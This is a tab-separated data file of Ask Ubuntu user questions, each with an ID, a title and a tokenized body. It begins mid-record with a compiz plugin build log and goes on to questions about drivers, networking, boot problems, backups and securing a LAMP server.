‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:375:5 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:375:24 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp : in member function ‘bool stereoscopicoutputwindow : :gldraw ( const glmatrix & , int ) ’ : /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:381:5 : error : ‘mask’ was not declared in this scope /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:390:43 : error : ‘fragment’ was not declared in this scope /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:390:53 : error : ‘region’ was not declared in this scope /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp : in member function ‘void stereoscopicoutputwindow : :gldrawgeometry ( ) ’ : /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:476:18 : error : ‘class glwindow’ has no member named ‘gldrawgeometry’ /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp : at global scope : /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:481:5 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:481:24 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp : in member function ‘void stereoscopicoutputwindow : :gldrawtexture ( gltexture* , int ) ’ : /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:484:5 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:484:24 : error : expected ‘ ; ’ before ‘fa’ /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:494:76 : error : ‘fa’ was not declared in this scope /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:510:39 : error : ‘fa’ was not declared in this scope /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:510:43 : error : ‘mask’ was not declared in this scope at global scope : cc1plus : warning : unrecognized command line option `` -wno-unused-private-field '' [ enabled by default ] make [ 2 ] : *** [ cmakefiles/stereoscopicoutput.dir/src/stereoscopicoutput.cpp.o ] error 1 make [ 1 ] : *** [ cmakefiles/stereoscopicoutput.dir/all ] error 2 make : *** [ all ] error 2 root @ w-virtualbox : /home/w/downloads/stereo-3d-plugin/build # does anyone have any advice from here i layed out my folder the same way as at this link http : //bazaar.launchpad.net/~ddudek/compiz-plugin-stereo3d/trunk/files/1/ with those files at that link
358639	what 's a dead ogonek , and where is it on my keyboard ?	i was changing a shortcut on gnome terminal and i found that : what is it ?
358640	borderless windows but keep title bar	i do n't really like the look of the borders on the windows of applications i 'm running . i 've tried disabling window decorator , but that takes away the title bar and shadow as well . ideally , i would like to see it as described in this article , where they include the following image :
358643	thunderbird chat - additional chat protocols	in windows i have the chat client trillian , that supports multiple chat protocols ( facebook , google+ , skype , aol , icq , msn , yahoo and many others ) . skype does not need to be installed , just trillian . i plan to switch to ubuntu , where thunderbird is installed . thunderbird has its own chat client that supports for example facebook and google+ . the other chat protocols are not supported in thunderbird . is there a way to add support for skype , aol , icq , and yahoo ? skype and icq would be most important .
358644	vim-airline status bar not shown when only single file is open	i am recently start using vim ( vim-gnome ) and also use plugin vim-airline . everything is fine but when i have only single file open , status bar shown but not rendered correctly ( not exact airline bar , no color ) . but if i have more then one file everything looks fine . any solution please ?
358652	audio error appears in terminal	i get this message appearing repeatedly in a terminal . [ 19:20:1013/192927 : error : audio_output_device.cc ( 186 ) ] not implemented reached in virtual void media : :audiooutputdevice : :onstatechanged ( media : :audiooutputipcdelegate : :state ) what is this and can it be fixed ?
358653	is there a rtl8723ae linux driver for 3.8.0-19-generic	i just installed ubuntu on my msi ge60-20c and recognized the wireless-driver not working well . after some searching i found out it 's a common problem and some people managed to get a proper driver working . though i could n't find any driver working for 3.8.0-19-generic : ( can you help me please ? ps : ubuntu 13.04 - 64 bit greets
358654	thunderbird chat - adding groups	is it possible to add in the contact list of the thunderbird chat some groups ( like friends , work , family ) where i can sort contacts into ?
358659	how to switch input language with caps lock in ubuntu 13.10 ?	ubuntu 13.10 has a different menu for text entry . i 'm using caps lock for swiching language input . after upgrade from 13.04 i 'm not able to switch languages with caps lock . looks like upgrade broke previous settings ( annoying ) . how do you make caps lock switch languages again using ui settings ? setxkbmap magic is not suitable .
358663	ubuntu 12.04.3 i386 gets stuck after restarting after the installation	i am new to linux systems and i wanted to try out ubuntu . but for some reason i am not able to explore the realm at all . after installing ubuntu i had to restart to fully enjoy the system as the software suggested it . so after restarting the os , it freezing on the loading screen . ubuntu is written on the screen and there are 4 ( or more ) red dots below of it . at first i assumed it had something to do with upgrade but after awaiting for 2 hours , i assume it is another issue . if you need more information , i will give them , if it is required . in before someone suggest to try to log in with ctrl alt f2+ , i ca n't get to the screen . the moment i see some texts 覺t reverts back to the ubuntu screen and stays there for ages .
358664	sbuild multiarch : warning : ca n't parse dependency libogg0 : i386	a question regarding multiarch . on my build server running ubuntu 12.04.3 i try to build a package of a game with a precompiled i386 executable for ubuntu 13.10 ( using a schroot ) . sbuild fails however : sbuild : warning : ca n't parse dependency libogg0 : i386 i have set multiarch-support as pre-depends . what am i doing wrong here ? ( sbuild version : 0.62.6-1ubuntu2 ) this is the debian/control file : source : rotc section : games priority : optional maintainer : christoph korn < christoph.korn @ getdeb.net > pre-depends : multiarch-support build-depends : debhelper ( > = 9 ) , libogg0 : i386 , libtheora0 : i386 , libsdl1.2debian : i386 , libxft2 : i386 , libc6 : i386 standards-version : 3.9.4 homepage : http : //ethernet.wasted.ch package : rotc architecture : any depends : $ { shlibs : depends } , $ { misc : depends } , rotc-data ( = $ { source : version } ) description : fast-paced , team multiplayer fps revenge of the cats : ethernet wants to be a fast-paced , teamwork-oriented , non-stop-action multiplayer pc fps game that allows players to achieve a high degree of mastery . . its main influences are subspace/continuum , starsiege : tribes and tron . package : rotc-data architecture : all depends : $ { misc : depends } description : fast-paced , team multiplayer fps ( data package ) revenge of the cats : ethernet wants to be a fast-paced , teamwork-oriented , non-stop-action multiplayer pc fps game that allows players to achieve a high degree of mastery . . its main influences are subspace/continuum , starsiege : tribes and tron . . ( this package contains the data files )
358666	advanced power settings , - shutdown after being in suspend mode	ubuntu keeps completely draining my battery when it is in suspend mode and the lid is closed , i suspect this may be a problem , as it has happened ( occasionally ) on two of my laptops both running 12.04 . where i will shut the lid , putting it in suspend mode , and come back in a day or two and find my battery at 0 % . in power management , both of my computers are set to suspend when the lid is closed . is there some kind of advanced power management scheme where i can tell my computer to suspend when the lid is closed , and then after some time or at some battery level go to shutdown state ?
358668	internal server error while accessing a php page in apache2	after install apache2 it work fine , but if reinstall php5 that the server does n't work , if i try to access http : //127.0.0.1 a give the error 500 , or a file of www folder , if i try to access a folder or a file of a folder all work fine . error 500 details : get http : //127.0.0.1/test.php 500 internal server error запрос get /test.php http/1.1 user-agent : opera/9.80 ( x11 ; linux x86_64 ) presto/2.12.388 version/12.16 host : localhost accept : text/html , application/xml ; q=0.9 , application/xhtml+xml , image/png , image/webp , image/jpeg , image/gif , image/x-xbitmap , */* ; q=0.1 accept-language : ru , en ; q=0.9 accept-encoding : gzip , deflate pragma : no-cache cache-control : no-cache connection : keep-alive ответ http/1.0 500 internal server error date : sun , 13 oct 2013 19:16:25 gmt server : apache/2.2.22 ( ubuntu ) x-powered-by : php/5.4.9-4ubuntu2.3 vary : accept-encoding content-encoding : gzip content-length : 20 content-type : text/html not error 500 : get http : //127.0.0.1/css/ 200 ok get /css/ http/1.1 user-agent : opera/9.80 ( x11 ; linux x86_64 ) presto/2.12.388 version/12.16 host : localhost accept : text/html , application/xml ; q=0.9 , application/xhtml+xml , image/png , image/webp , image/jpeg , image/gif , image/x-xbitmap , */* ; q=0.1 accept-language : ru , en ; q=0.9 accept-encoding : gzip , deflate connection : keep-alive ответ http/1.1 200 ok date : sun , 13 oct 2013 19:21:38 gmt server : apache/2.2.22 ( ubuntu ) vary : accept-encoding content-encoding : gzip content-length : 648 keep-alive : timeout=5 , max=99 content-type : text/html ; charset=utf-8 < ! doctype html public `` -//w3c//dtd html 3.2 final//en '' > [ ... ]
358670	unity does n't load any gui with a nvidia card	after a reboot , and not after doing anything that could justify this , my ubuntu 13.04 system is completely dead , in that every time i boot , and after i log in , there 's no launcher and no system bar on the top . the desktop looks fine , but there 's no way to run any program . since the only icon i have on the desktop is , incidentally , an .odt document , i have tried to double click on it , and it opens in openoffice write just fine , but the windows have no borders or title bar . it looks like the most basic window manager is not running . i do n't know whether it 's unity , or compiz , or what . the last things i had done before the last boot were : install virtualbox and create a virtual machine sudo apt-get install nvidia-current so i have entered a virtual terminal and removed both virtualbox and nvidia-current ( sudo apt-get remove ... ) , but that has n't fixed the issue . my system is completely unusable . i have rebooted three times without luck . what can i do ? i tried : ccsm - > try to enable the `` unity plugin '' . it has no checkbox ( like the one depicted in the screenshots in other answers ) , so i click on it as if it was a button , and it leads to a screen where there is a checkbox that says `` enable unity plugin '' . that issues a warning that another plugin is required , it prompts whether to not enable unity plugin or enable the other one that is required , i choose the latter , and so on for a couple more plugins . at the end , it is impossible to close the ccsm window , because the `` close '' button does nothing , and there is no window bar . this does n't change a thing . even after logging out/in ( which i perform by killing xorg ) or rebooting , i 'm still stuck with an empty desktop with no unity launcher or top sytem bar . dconf reset -f /org/compiz/ and unity -- reset-icons & disown outcome : it vomits dozens of compiz errors ( ca n't init this and that plugin , fatal dunnowwhat , something ( ) unavailable on screen 0 , and a lot more ) and ends with a segfault . does n't fix the issue . deleted .config/compiz-1 folder tree in my home directory , with or without going to ctrl + alt + f1 did n't change a thing the farthest i 've been able to go is the following , which does get me unity running but without the nvidia drivers and with only 640x480 resolution : sudo apt-get remove nvidia-304 reboot = > now my screen is 640x480 dconf reset -f /org/compiz/ & & setsid unity this brings up the loved and familiar unity shell . however , if i go to system settings and display , the only available resolution is 640x480 . i guess it is the one my non-nvidia card supports ( though it seems pretty strange to me : i thought this computer had an intel hd4000 gpu which should support pretty good resolutions ) after this , i tried reinstalling nvidia-current ( which installs nvidia-304 ) and then i repeated dconf reset -f /org/compiz/ & & setsid unity , but this has the same outcome as ( 2 ) uninstalled nvidia-304 again , and tried with sudo apt-get install nvidia-310 , and again reset -f /org/compiz/ & & setsid unity same outcome as ( 5 ) and ( 2 ) .
358676	brother hl-2240 printer driver	where can i find a good driver for a brother hl-2240 printer . the one from brother wo n't load on ubuntu 12.04 .
358679	ubuntu 13.04 glitched screen	i just installed ubuntu 13.04 alongside with windows vista on my old laptop . the installation took some time , but after a hour or so it was done . everything worked nicely , and i was going to log in to my user and test out ubuntu . the log in was fine , but after a while the screen froze . i restartet the pc , and after a while it froze again . the third time the screen got really bugged , and weird kind of `` pixel glitches '' started occuring , as you can see on these pictures : ( i do n't have enough reputation , so please just click the links and watch them in your browser ) http : //i.stack.imgur.com/ie8qy.jpg http : //i.stack.imgur.com/cqljx.jpg it really bugs me , 'cause i really wan na start using ubuntu , but i ca n't when this happens : ( anyone here that can help me ? i would really appreciate it ; ) kind regards , mathias
358680	monodevelop gtk issues	being developing c # application with gtk and i got 5 errors : the type or namespace name 'gtk ' could not be found 'gdk' using ubuntu 13.04 x86_64bit i have tried installing gtk-sharp2 but with no luck anyone got any ideas , or solutions .
358681	how to clone harddisk for moving ubuntu to a new machine ?	i am moving my ubuntu box to a new hardware and for that i must clone the entire harddisk to a new one . i have read about clonezilla and dd but i am unsure how to use them . i could also hook up both harddisks to a windows machine and clone there . what is the best way to do that ?
358683	ati mobility radeon m82/m86/rs780m	i have a hp pavilion dv5-1200eo entertainment notebook pc with ati mobility radeon m82/m86/rs780m and i have n't been able to find any working drivers for it . it is overheating and working poorly . i ca n't find it on hp.com or ati.com . the drivers i 've downloaded fails to install . can you direct me to the best driver for my graphics ? help very much needed . i have also installed tlp to no avail . thanks guys . //edit no i could n't install it . but i might have been doing it wrong . i ran sh amd-driver-installer-catalyst-13-4-x86.x86_64.run jon-are @ hp-ubuntu : ~ $ lspci -nnk | grep -a5 vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv620/m82 [ mobility radeon hd 3450/3470 ] [ 1002:95c4 ] subsystem : hewlett-packard company device [ 103c:3600 ] kernel driver in use : radeon 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati rv620 hdmi audio [ radeon hd 3400 series ] [ 1002 : aa28 ] subsystem : hewlett-packard company device [ 103c:3600 ] kernel driver in use : snd_hda_intel
358684	virtualizing windows and ubuntu with xen	alright , so i 'm constantly switching between windows and linux , and i 'd love to be able to just switch whenever i need without a full reboot , and after a bit of research i came up with xen . i found the community documentation here , and it seems pretty straightforward , i just need to know if it will work for a normal desktop build as-is ( from my limited understanding , the document seems to be aimed for servers ) , or if it needs a bit of modification . also , am i correct in thinking that i 'll be able to boot both at the same time , and just switch between both ubuntu ( 13.10 i think ) and windows 8 ? ( with some performance impact ) on a side note , if somebody could also tell me ( in the comments ) if the amd fx-6300 is compatible with xen , that would be great . ( it does support virtualization , but i know with intel , there is vt-d and vt-x , and i 'm not sure if it matters with amd though.. )
358685	partition problems : hdd seen twice	i am a litle to no experienced with linux , so please be kind : ) . i have a problem with all linux distributions.what i am trying to do is just install ubuntu/mint . same problem on all . what exactly my problem is ? as my english is not so good , i will explain what steps i follow to install linux : make a bootable usb then plug it in the computer . partition the hdd : new partition table > ext4 270 gigs volume mounted on `` / '' , swap double as ram = 24gigs . install . everything goes fine . click reboot when install is finished , but it hangs . screen is black , no signal , but the pc is still running . reset the pc , everything starts normally . now , in mint same problem as on ubuntu , i can see 2 partitions , even if i did n't make 2 . one is `` samsung sj3200aajs '' or something like it , and `` filesystem '' . clicking on `` samsung ... '' partition shows me an error : '' can not mount file '' . right click > properties > every info is `` unknown '' , capacity , mountpoint , etc . gparted shows only 1 partition and a swap space . i tried several times , creating a single partition with no swap . nothing , same issue . tried replacing the hdd , same issue . why is this happening ? i am very frustrated . my pc 's specs : 4gb x3 trichannel ddr3 ram xeon 5550 processor 2x gtx 480 hair-driers 1000w psu motherboard : aspire m7721 crappy 320 hdd . ps : if you need any more informations , please reply and i will post it asap . fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00086642 device boot start end blocks id system /dev/sda1 2046 7999487 3998721 5 extended /dev/sda2 * 7999488 625141759 308571136 83 linux /dev/sda5 2048 7999487 3998720 82 linux swap / solaris disk /dev/sdb : 15.5 gb , 15518924800 bytes // this is my usb toshiba 16gigs drive 255 heads , 63 sectors/track , 1886 cylinders , total 30310400 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00399248 device boot start end blocks id system /dev/sdb1 * 2048 30310399 15154176 c w95 fat32 ( lba ) fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=b9c91b0e-640c-468f-89c1-11d8353648d9 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=66e344e1-4895-4bfb-8bbf-0f565feff8cd none swap sw 0 0
358686	booting off a usb drive	once i click the usb drive to boot off of it says '' syslinux 4.06 edd 2012-10-13 copyright ( c ) 1994-1012 h. peter anvin et al '' the rest of the screen is black and i have no idea what to do . can anyone help me ?
358688	ubuntu 12.04 adpter usb ethernet	hi i recently bought an usb-ethernet adapter for my laptop ( sony vaio pro 13 ) . i 've followed this guide ( http : //simon.schllng.de/2013/08/10/ubuntu-auf-dem-sony-vaio-pro-13/ ? lang=en ) to make my wirless card working , but after that ubuntu does not connect with the lan connected via the adapter to my pc . the usb-ethernet adapter in question is a kontron ( industrial computer source / ics advent ) dm9601 fast ethernet adapter ( this is the output of lsusb ) . i do not know what to do . thanks for the help
358691	ubuntu one deja dup space limit reached	i 've a problem with my deja dup and backup to ubuntu one . the space limit is reached and i read the clearing out deja-dup backups from my ubuntu one cloud ? and folowed the steps 1 to 5 . but i did n't delete the files out of the backup folder , i deleted the backup folder ! i think you know what happend . i do n't see the files and the space is still in use . i want to start from scratch with deja dup ! a ) can you give me a clue how i can achieve a deletion of the backup files . b ) the link above noted a quota , where can i amend this attribute ? c ) how can i amend the time how long the files will be kept . thanks in advance , hans-peter
358693	unable to start ubuntu 13.04 installation media on vmware player	i have just downloaded ubuntu 13.04 , and am attempting to run it from vmware player 6 . i have previously successfully run ubuntu 10.10 on vmware player 6 . my laptop os is vista . if i select create a new virtual machine , and select the iso-file , there is an error which says : # could not detect which operating system is in this disc image . # you will need to specify which operating system will be installed '' , but it is added to the menu when i select `` linux '' as the os type . now this what happens when i try to launch 13.04 from the vmware player : i see ubuntu 13.04 listed on the menu to play in vmware . when i play it , a window appears which says : # network boot from amd am79c970a # copyright ( c ) 2003-2008 vmware , inc. # copyright ( c ) 1997-2008 intel corporation # client mac addr : 00 0c 29 4c 24 2e guid : 564db112-f848-1088-3cb7-956f2c4c242e # pxe-e53 : no boot filename received # pxe-m0f : exiting intel pxe rom . # operating system not found and there is a message bar at the bottom of vmplayer which says : # ubuntu is not installed on this virtual machine . insert the installer disc and click `` restart vm '' '' is this only a problem with 13.04 ? ( it takes me a long time to download . ) i would really appreciate if someone please help me to get it running !
358694	backup server docs and sql files with grive	has anyone ever used grive for ubuntu server backs up to google drive ? how safe would this be ? ( not sure if my `` anti-google '' boss would like it too much but still )
358695	the package python3.2 needs to be reinstalled , but i ca n't find an archive for it	i get this error when i try to update or run software center , but i ca n't find an archive for it : the package python3.2 needs to be reinstalled
358697	can not recognize wired or wireless connection	i just installed ubuntu 13.04 on an old laptop of mine and i ca n't connect to the internet . the computer is a dell vostro 1500 . this is my first time using linux so i really have no idea what i am doing , but i 'm trying to learn . i know this has probably been posted a bunch of times but after looking through several i could n't find any with the same problem lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) . ifconfig link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3529 errors:0 dropped:0 overruns:0 frame:0 tx packets:3529 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:289936 ( 289.9 kb ) tx bytes:289936 ( 289.9 kb ) . ~ $ sudo ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8601 errors:0 dropped:0 overruns:0 frame:0 tx packets:8601 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:708816 ( 708.8 kb ) tx bytes:708816 ( 708.8 kb ) . ~ $ sudo iwconfig lo no wireless extensions .
358702	is there a way to blank 2 of 3 monitors with a shortcut or hotkey and leave primary monitor on ?	i am only staying with windows because of a feature that so far i can not find that linux has . i am trying to find a way to blank 2 specific monitors and leave my primary monitor on . preferably with a bash or with keyboard . this will be used when watching a video on the primary screen and not needed the other 2 monitors . ie the setup i have in windows is a program that allows me to `` blank '' any monitors i want with a keyboard shortcut . i have a nvidia gfx card .
358703	incompatibility between ubuntu one and hamachi ?	i have recently decided to install the ubuntu one program on my windows 7 computer , but i have discovered that , each time i install it , it disable my hamachi ( the program refuse to start ) . well , at least , i can simply chose , which one i want to use when i launch my computer , but the problem is that , when i restart hamachi , it broke ubuntu one 's installation and i need to re-install it.. which will make me unable to use hamachi . as i have a need for an automatic update of my cloud but also for a functional vpn program , this is quite problematic . is it normal ? is there a way to fix it ?
358706	ubuntu 12.04 lts secure lamp server	so ... i 've been been unfortunate with my linux vps server running 12.04.3 lts . i had a bad php script running that basically opened up for a mysql injection . and because of a stupid configuration from my side this mysql injection ended with a escalation exploit where the person gained access to everything . i managed to catch this in time and backed up my stuff and wiped the server . so , i 've re-installed and re-evaluated everything i thought i knew and started from scratch . what do i have running ... well . apache2 2.2.22 php5 5.3.10-1ubuntu3.8 with suhosin patch 0.9.10 ) mysql-server postfix ssh iptables i 've installed all of these individually , i did n't do `` apt-get install lamp '' . apt-get install ssh apache2 mysql-server php5 php5-mysql postfix iptables ... is pretty much it i think . for apache2 , i 've followed a few guides which i ca n't seem to find among my 300+ tabs in firefox . i 'm sure there must be some more stuff i need to do to fully secure apache . for php5 i made sure i installed suhosin patch and i followed a guide or two where i edited the config . i 'm sure there must be something here as well that i could do to protect myself . my mysql server is set up to only accept from localhost . i use ssh tunnel to be able to connect to it with navicat so i can do backups and such . i 've made sure that all users besides root does not have any server privileges , this was what screwed the pooch the last time ( yes i know , silly me ... i had completely forgotten that i had used a user in the past to remote connect then used that for something else which then let to the escalation exploit ) . and i 've added a line in the config that stops mysql from being able to load local files into tables and such . either way ... i feel that i 've done what i can with mysql server for now . postfix was a default install , i did nothing . i later uninstalled it because i did not find a suitable guide for it . and i saw so many said that postfix is a disaster to configure and if left in default state , you are begging for a hack . or so they said ... shrugs what i 've done so far is secured ssh by running it on a alternative port and i 've used puttygen to generate a rsa key with 4096bit encryption with a passphrase . i 've disabled root login via ssh config and pam . the only way to log in to ssh now is via the rsa pubkey using the key i generated . and this works really great . and i feel confident that ssh is secure now . no way in without the private key and the password as far as i understand . iptables , well , every server needs iptables . i have a bunch of ip 's i 've blocked . and probably more to be blocked in the future . alright ... soo , now on my freshly installed server , i 've managed to revert almost everything . i have removed the php page that was the entry point for the hacker and i 've used a clean install of files for my smf forum software . i 've kept the attachments of the forum though as they were an important part of my forum . basically i 'm ready to boot up my forum with the old database and force all users to change passwords . now , the hacker , is a former forum user on my forum . so i sort of know him . he saw hacking my server as a gift to me so i could clean up the security hole . now this might be so ... it has indeed made me more security aware . so much so that i 've spent almost 2 weeks non-stop reading up on the internet about how to secure these services that i am running . now , with my freshly installed server , i get a private message over steam from the same guy ( the hacker ) , stating he found another loop hole , but he 's not going to tell me what it is this time because i iptabled him and his vpn . the guy feels that he should be rewarded for breaking into my server . personally , if a person breaks in , you do n't offer him cake and coffee . you break his legs ... then call the cops . coughs anyway , this brings me to postfix . i installed this because i do n't want to pay for a mail delivery system for my forum when all i need to do is send a few emails a day . it 's not a huge forum , so the odd chance is that the only times i will send a lot of emails is when i do newsletters to my 250+ members . i feel sure that apache , php5 and ssh are secure . and i feel secure that my wordpress frontpage and smf forum are secure as well ( i uninstalled almost all most and went with only the most basic mods ) . like i said , all files are fresh but my attachments from the smf forum . but i feel that i might be getting trolled here . though i might be wrong ... i am in need of a postfix service tho , just so the forum can send mail . i do n't need to recieve any . so i 'm wondering , can i keep postfix with default settings ? or will these open me for attack ? the guy , like i said , is either trolling me because he wants me to be more paranoid or he 's telling me the truth . could anyone shed some light here ? i mean , apache , php , mysql and ssh seem secure . if there are more php files laying around that he can mysql intject into , then he at least wo n't get far as none of the users have grant , nor do they have server privileges . so i 'm guessing the postfix is his entry point ? or am i just being trolled ?
358707	graphic drivers in pavilion dv6	i am a new ubuntu user and i am trying to install it for study purposes . when i tried to install it alongside windows 7 it gives me the error the system is running in low-graphics mode . then i read somewhere it has probably to do with the drivers . then i ran lspci -nn | grep vga command to get details : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] [ 1002:68c1 ] so how can i fix my graphic problem ?
358710	problem with booting newly installed lubuntu	i have tried to install lubuntu on a dell inspirion mini for my sister , but i 'm not able to boot it . i get the error message : error : file '/grub/i386-pc/normal.mod ' not found . grub rescue > i 'm already searching a whole evening on it , but nothing seems to help . i followed different guides for solving problems that where very alike , but that did n't seem to help . on a certain moment i had an other message when trying to start up : gnu grub version 2.00-13ubuntu3 minimal bash-like etc ... i tried to 'fix ' that with boot-repair ( https : //help.ubuntu.com/community/boot-repair ) , using the lubuntu live usb that i also used to do the initial installation ( and the second one , when i tried it again ) . at the end i needed to install grub in the partition i wanted , but at each partition i selected , i only got the message `` are you certain you want to continue without installing grub ? ( or something like that , did n't copy that one ) , so in the end i just said yes . boot-repair then said i should be able to start-up normally now and in case i was n't i should contact my favourite forum with the problem and give you the following link : http : //paste.ubuntu.com/623364
358714	ca n't redirect standard output	i 'm following along with the examples in chapter 6 redirection of the linux command line ( 2012 ) . i am trying to redirect the standard output of an ls command to a text file . i keep receiving a permission denied error . i 'm using ubuntu 13.04 . see below : ta2tyrants @ vaio : / $ ls -l /usr/bin > > ls-output.txt bash : ls-output.txt : permission denied i tried to run this command using root access and get the same error : ta2tyrants @ vaio : / $ sudo ls -l /usr/bin > > ls-output.txt bash : ls-output.txt : permission denied what am i doing wrong ? is there a way to get around this ?
358717	back up a 12.04 system , then upgrade to 13.04 using a liveusb , then restore backup to regain files . does that work ?	i 'm getting ready to upgrade my 12.04 install to 13.04 , but i have seriously personalized my system with external ppas , ubuntu tweak , and the like . i backed up my system with deja-dup , and i was wondering if once my upgrade is finished , i can get all my settings back in 13.04 by restoring from deja-dup . will it even be able to restore ? anyway , it 's not a huge deal if it ca n't . i 'm still going to upgrade . i have all the important stuff safe . it would just be a pain if i had to set up all my settings again . if you got any ideas , please say . i 'd really appreciate it . thanks .
358722	ubuntu 12.04 and macbook 4,1 wireless problem ; no wired connection	i just installed ubuntu 12.04 to dual boot with os x lion on my macbook 4,1 ( early 2008 ) . wireless does n't work . ubuntu knows -- get the broadcom driver , right ? sure , but the problem is i 'm tethered to an iphone and thus have no access to a wired connection to download it in ubuntu ! so my question is how do i download the driver on os x and install it in ubuntu ? update 1 : i followed the instructions here , had problems the first time i tried it ( gave me a big screen full of text and had to restart ) , and now get the text `` invalid rom contents '' before the ubuntu desktop loads . wireless still does not work . any solutions ? update 2 : i just tried following instructions here and here . did n't work ! for some reason it ca n't get anything from the install media . it seems like certain files are missing or do n't work and certain options are just unavailable . with broadcom 's own instructions , i get `` operation not permitted '' on the terminal commands under step 2 of the instructions for a fresh installation . there has to be an answer ! update 3 : i am able to connect to the internet briefly with ubuntu using bluetooth to tether . the connection is intermittent , only staying on for a few seconds before disconnecting and connecting again . i can visit web pages but i ca n't say it would work on package downloads . i tried installing the broadcom drivers through `` additional hardware '' but got the same error message i got before about not being able to install it . update 4 : the output of lspci -nn | grep -i network is 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 03 ) and of uname -r , 3.8.0-29-generic sudo modprobe b43 does n't seem to do anything . i do still have the /lib/firmware/b43 folder and contents as explained in update 1 -- it gave me some trouble .
358724	new ubuntu install wireless help	i 've installed ubuntu and updated using a wired connection but i ca n't connect to wireless . the network is detected but wo n't connect . i know this is a common question so i searched for additional hardware and it said there was no proprietary software . my chipset query on the terminal came back as qualcom atheros ar 9485 . is there a package i can download to get me online wirelessly ? any help is appreciated .
